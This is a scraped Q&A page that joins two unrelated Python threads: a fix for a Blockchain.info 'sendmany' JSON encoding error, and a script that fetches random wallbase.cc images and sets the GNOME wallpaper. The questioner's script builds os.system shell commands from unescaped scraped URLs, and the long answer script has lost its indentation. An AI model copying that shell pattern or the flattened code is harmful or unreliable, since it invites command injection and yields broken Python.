File "D:\Documents\B\Code\A\jsontest.py", line 121, in SendManyPayment
response = self.Call('sendmany',data)
File "D:\Documents\B\Code\A\jsontest.py", line 86, in Call
raise RuntimeError('ERROR: ' + json['error'])
RuntimeError: ERROR: Invalid Recipients JSON. Please make sure it is url encoded and consult the docs.
What does data['recipients'] contain inside your SendManyPayment() function? It looks like you are trying to do some manual encoding instead of using json.dumps(recipients).
The docs say it should look like this:
{
    "1JzSZFs2DQke2B3S4pBxaNaMzzVZaG4Cqh": 100000000,
    "12Cf6nCcRtKERh9cQm3Z29c9MWvQuFSxvT": 1500000000,
    "1dice6YgEVBf88erBFra9BHf6ZMoyvG88": 200000000
}
Try this out for send many:
def SendManyPayment(self, fromaddr = True, shared = False, fee = 0.0001, note = True):
    data = {}
    recipients = self.d_url_enc
    # recipients should be a json string FIRST!
    data['recipients'] = json.dumps(recipients)
    data['fee'] = str(fee)
    if fromaddr:
        data['from'] = 'A'
    if shared:
        data['shared'] = 'true'
    else:
        data['shared'] = 'false'
    if note:
        data['note'] = 'n'
    response = self.Call('sendmany',data)
    return response
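A small self-contained sketch of the point above (addresses and amounts are just the ones from the docs snippet): json.dumps() is applied to the {address: amount} mapping itself, not to a url-encoded string, so the API receives a JSON object like the one in the docs. In the question's code that mapping would be self.d rather than self.d_url_enc.

import json
import urllib

# {address: amount in satoshi} mapping, as in the docs example above
recipients = {
    "1JzSZFs2DQke2B3S4pBxaNaMzzVZaG4Cqh": 100000000,
    "12Cf6nCcRtKERh9cQm3Z29c9MWvQuFSxvT": 1500000000,
}

good = json.dumps(recipients)                   # '{"1JzSZ...": 100000000, ...}'  <- a JSON object
bad = json.dumps(urllib.urlencode(recipients))  # '"1JzSZ...=100000000&..."'      <- just a quoted string

print(good)
print(bad)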

Automatic background changer using Python 2.7.3 not working, though it should

I'm very new to Ubuntu/Python/Bash/Gnome in general, so I still feel like there's a chance I'm doing something wrong, but it's been 3 days now without success...
Here's what the script is supposed to do:
* [✓] Download 1 random image from wallbase.cc
* [✓] Save it to the same directory that the script is running from
* [x] Set it as the wallpaper
There are two attempts made to set the wallpaper using two different commands, and NEITHER works when run from the script. There is a print statement (2nd line from the bottom) that spits out the correct terminal command; I can copy and paste the print result and it works fine, it just doesn't work when it's executed in the script.
#!/usr/bin/env python
import urllib2
import os
from gi.repository import Gio
response = urllib2.urlopen("http://wallbase.cc/random/12/eqeq/1366x768/0.000/100/32")
page_source = response.read()
thlink_pos = page_source.find("ico-X")
address_start = (page_source.find("href=\"", thlink_pos) + 6)
address_end = page_source.find("\"", address_start + 1)
response = urllib2.urlopen(page_source[address_start:address_end])
page_source = response.read()
bigwall_pos = page_source.find("bigwall")
address_start = (page_source.find("src=\"", bigwall_pos) + 5)
address_end = page_source.find("\"", address_start + 1)
address = page_source[address_start:address_end]
slash_pos = address.rfind("/") + 1
pic_name = address[slash_pos:]
bashCommand = "wget " + page_source[address_start:address_end]
os.system(bashCommand)
print "Does my new image exists?", os.path.exists(os.getcwd() + "/" + pic_name)
#attempt 1
settings = Gio.Settings.new("org.gnome.desktop.background")
settings.set_string("picture-uri", "file://" + os.getcwd() + "/" + pic_name)
settings.apply()
#attempt 2
bashCommand = "gsettings set org.gnome.desktop.background picture-uri file://" + os.getcwd() + "/" + pic_name
print bashCommand
os.system(bashCommand)
settings.apply()
You've successfully changed your settings, but they're still left unapplied; try the following:
settings.apply()
after setting the "picture-uri" string.
It works for me (Ubuntu 12.04).
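For reference, a minimal stand-alone version of the two steps described above (the image path is a placeholder):

# Minimal sketch: point picture-uri at an image and apply the change.
from gi.repository import Gio

settings = Gio.Settings.new("org.gnome.desktop.background")
settings.set_string("picture-uri", "file:///home/user/Pictures/wall.jpg")  # placeholder path
settings.apply()  # without this the new value may be left unapplied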
I've modified your script (unrelated to your error):
#!/usr/bin/python
"""Set desktop background using random images from http://wallbase.cc
It uses `gi.repository.Gio.Settings` to set the background.
"""
import functools
import itertools
import logging
import os
import posixpath
import random
import re
import sys
import time
import urllib
import urllib2
import urlparse
from collections import namedtuple
from bs4 import BeautifulSoup # $ sudo apt-get install python-bs4
from gi.repository.Gio import Settings # pylint: disable=F0401,E0611
DEFAULT_IMAGE_DIR = os.path.expanduser('~/Pictures/backgrounds')
HTMLPAGE_SIZE_MAX = 1 << 20 # bytes
TIMEOUT_MIN = 300 # seconds
TIMEOUT_DELTA = 30 # jitter
# "Anime/Manga", "Wallpapers/General", "High Resolution Images"
CATEGORY_W, CATEGORY_WG, CATEGORY_HR = range(1, 4)
PURITY_SFW, PURITY_SKETCHY, PURITY_NSFW, PURITY_DEFAULT = 4, 2, 1, 0
DAY_IN_SECONDS = 86400
UrlRetreiveResult = namedtuple('UrlRetreiveResult', "path headers")
def set_background(image_path, check_exist=True):
"""Change desktop background to image pointed by `image_path`.
"""
if check_exist: # make sure we can read it (at this time)
with open(image_path, 'rb') as f:
f.read(1)
# prepare uri
path = os.path.abspath(image_path)
if isinstance(path, unicode): # quote() doesn't like unicode
path = path.encode('utf-8')
uri = 'file://' + urllib.quote(path)
# change background
bg_setting = Settings.new('org.gnome.desktop.background')
bg_setting.set_string('picture-uri', uri)
bg_setting.apply()
def url2filename(url):
"""Return basename corresponding to url.
>>> url2filename('http://example.com/path/to/file?opt=1')
'file'
"""
urlpath = urlparse.urlsplit(url).path # pylint: disable=E1103
basename = posixpath.basename(urllib.unquote(urlpath))
if os.path.basename(basename) != basename:
raise ValueError # refuse 'dir%5Cbasename.ext' on Windows
return basename
def download(url, dirpath, extensions=True, filename=None):
"""Download url to dirpath.
Use basename of the url path as a filename.
Create destination directory if necessary.
Use `extensions` to require the file to have an extension or any
of in a given sequence of extensions.
Return (path, headers) on success.
Don't retrieve url if path exists (headers are None in this case).
"""
if not os.path.isdir(dirpath):
os.makedirs(dirpath)
logging.info('created directory %s', dirpath)
# get filename from the url
filename = url2filename(url) if filename is None else filename
if os.path.basename(filename) != filename:
logging.critical('filename must not have path separator in it "%s"',
filename)
return
if extensions:
# require the file to have an extension
root, ext = os.path.splitext(filename)
if root and len(ext) > 1:
# require the extension to be in the list
try:
it = iter(extensions)
except TypeError:
pass
else:
if ext not in it:
logging.warn(("file extension is not in the list"
" url=%s"
" extensions=%s"),
url, extensions)
return
else:
logging.warn("file has no extension url=%s", url)
return
# download file
path = os.path.join(dirpath, filename)
logging.info("%s\n%s", url, path)
if os.path.exists(path): # don't retrieve if path exists
logging.info('path exists')
return UrlRetreiveResult(path, None)
try:
return UrlRetreiveResult(*urllib.urlretrieve(url, path,
_print_download_status))
except IOError:
logging.warn('failed to download {url} -> {path}'.format(
url=url, path=path))
def _print_download_status(block_count, block_size, total_size):
logging.debug('%10s bytes of %s', block_count * block_size, total_size)
def min_time_between_calls(min_delay):
"""Enforce minimum time delay between calls."""
def decorator(func):
lastcall = [None] # emulate nonlocal keyword
@functools.wraps(func)
def wrapper(*args, **kwargs):
if lastcall[0] is not None:
delay = time.time() - lastcall[0]
if delay < min_delay:
_sleep(min_delay - delay)
lastcall[0] = time.time()
return func(*args, **kwargs)
return wrapper
return decorator
@min_time_between_calls(5)
def _makesoup(url):
try:
logging.info(vars(url) if isinstance(url, urllib2.Request) else url)
page = urllib2.urlopen(url)
soup = BeautifulSoup(page.read(HTMLPAGE_SIZE_MAX))
return soup
except (IOError, OSError) as e:
logging.warn('failed to return soup for %s, error: %s',
getattr(url, 'get_full_url', lambda: url)(), e)
class WallbaseImages:
"""Given parameters it provides image urls to download."""
def __init__(self,
categories=None, # default; sequence of CATEGORY_*
resolution_exactly=True, # False means 'at least'
resolution=None, # all; (width, height)
aspect_ratios=None, # all; sequence eg, [(5,4),(16,9)]
purity=PURITY_DEFAULT, # combine with |
thumbs_per_page=None, # default; an integer
):
"""See usage below."""
self.categories = categories
self.resolution_exactly = resolution_exactly
self.resolution = resolution
self.aspect_ratios = aspect_ratios
self.purity = purity
self.thumbs_per_page = thumbs_per_page
def _as_request(self):
"""Create a urllib2.Request() using given parameters."""
# make url
if self.categories is not None:
categories = "".join(str(n) for n in (2, 1, 3)
if n in self.categories)
else: # default
categories = "0"
if self.resolution_exactly:
at_least_or_exactly_resolution = "eqeq"
else:
at_least_or_exactly_resolution = "gteq"
if self.resolution is not None:
resolution = "{width:d}x{height:d}".format(
width=self.resolution[0], height=self.resolution[1])
else:
resolution = "0x0"
if self.aspect_ratios is not None:
aspect_ratios = "+".join("%.2f" % (w / float(h),)
for w, h in self.aspect_ratios)
else: # default
aspect_ratios = "0"
purity = "{0:03b}".format(self.purity)
thumbs = 20 if self.thumbs_per_page is None else self.thumbs_per_page
url = ("http://wallbase.cc/random/"
"{categories}/"
"{at_least_or_exactly_resolution}/{resolution}/"
"{aspect_ratios}/"
"{purity}/{thumbs:d}").format(**locals())
logging.info(url)
# make post data
data = urllib.urlencode(dict(query='', board=categories, nsfw=purity,
res=resolution,
res_opt=at_least_or_exactly_resolution,
aspect=aspect_ratios,
thpp=thumbs))
req = urllib2.Request(url, data)
return req
def __iter__(self):
"""Yield background image urls."""
# find links to bigwall pages
# css-like: #thumbs div[class="thumb"] \
# a[class~="thlink" and href^="http://"]
soup = _makesoup(self._as_request())
if not soup:
logging.warn("can't retrieve the main page")
return
thumbs_soup = soup.find(id="thumbs")
for thumb in thumbs_soup.find_all('div', {'class': "thumb"}):
bigwall_a = thumb.find('a', {'class': "thlink",
'href': re.compile(r"^http://")})
if bigwall_a is None:
logging.warn("can't find thlink link")
continue # try the next thumb
# find image url on the bigwall page
# css-like: #bigwall > img[alt and src^="http://"]
bigwall_soup = _makesoup(bigwall_a['href'])
if bigwall_soup is not None:
bigwall = bigwall_soup.find(id='bigwall')
if bigwall is not None:
img = bigwall.find('img',
src=re.compile(r"(?i)^http://.*\.jpg$"),
alt=True)
if img is not None:
url = img['src']
filename = url2filename(url)
if filename.lower().endswith('.jpg'):
yield url, filename # successfully found image url
else:
logging.warn('suspicious url "%s"', url)
continue
logging.warn("can't parse bigwall page")
def main():
level = logging.INFO
if '-d' in sys.argv:
sys.argv.remove('-d')
level = logging.DEBUG
# configure logging
logging.basicConfig(format='%(levelname)s: %(asctime)s %(message)s',
level=level, datefmt='%Y-%m-%d %H:%M:%S %Z')
if len(sys.argv) > 1:
backgrounds_dir = sys.argv[1]
else:
backgrounds_dir = DEFAULT_IMAGE_DIR
# infinite loop: Press Ctrl+C to interrupt it
#NOTE: here's some arbitrary logic: modify for your needs e.g., break
# after the first image found
timeout = TIMEOUT_MIN # seconds
for i in itertools.cycle(xrange(timeout, DAY_IN_SECONDS)):
found = False
try:
for url, filename in WallbaseImages(
categories=[CATEGORY_WG, CATEGORY_HR, CATEGORY_W],
purity=PURITY_SFW,
thumbs_per_page=60):
res = download(url, backgrounds_dir, extensions=('.jpg',),
filename=filename)
if res and res.path:
found = True
set_background(res.path)
# don't hammer the site
timeout = max(TIMEOUT_MIN, i % DAY_IN_SECONDS)
_sleep(random.randint(timeout, timeout + TIMEOUT_DELTA))
except Exception: # pylint: disable=W0703
logging.exception('unexpected error')
_sleep(timeout)
else:
if not found:
logging.error('failed to retrieve any images')
_sleep(timeout)
timeout = (timeout * 2) % DAY_IN_SECONDS
def _sleep(timeout):
"""Add logging to time.sleep() call."""
logging.debug('sleep for %s seconds', timeout)
time.sleep(timeout)
main()
Tried to implement a python script that used the PIL library to write text on an image then update the Gnome background "picture-uri" to point to that image using the Gio class. The python script would ping pong between two images to always modify the one not in use and then attempt to "switch" by updating the Settings. Did this to avoid any flicker as modifying the current background directly drops it out temporarily. While in the shell and calling the script directly I rarely saw any issue, but in the cronjob it simply wouldn't update on the pong. I used both sync and apply and would wait several minutes before trying to switch the images. Didn't work. Tried cron as user (su -c "cmd" user) and that didn't work either.
Finally gave up on the ping pong approach when I noticed that Gnome will detect any change in the background file and update. So dropped the ping pong method and went to a temp file that I just copy over the current background using the shutil library. Works like a charm.
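A minimal sketch of that final approach (paths are placeholders): render the new image to a temporary file, then copy it over the file that picture-uri already points to, and let Gnome pick up the change.

# Sketch: overwrite the current background file in place so Gnome reloads it.
import shutil

TMP_IMAGE = "/tmp/background_next.jpg"                     # freshly rendered image (placeholder)
CURRENT_BG = "/home/user/Pictures/current_background.jpg"  # file picture-uri points at (placeholder)

shutil.copyfile(TMP_IMAGE, CURRENT_BG)  # Gnome detects the file change and updates the wallpaper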
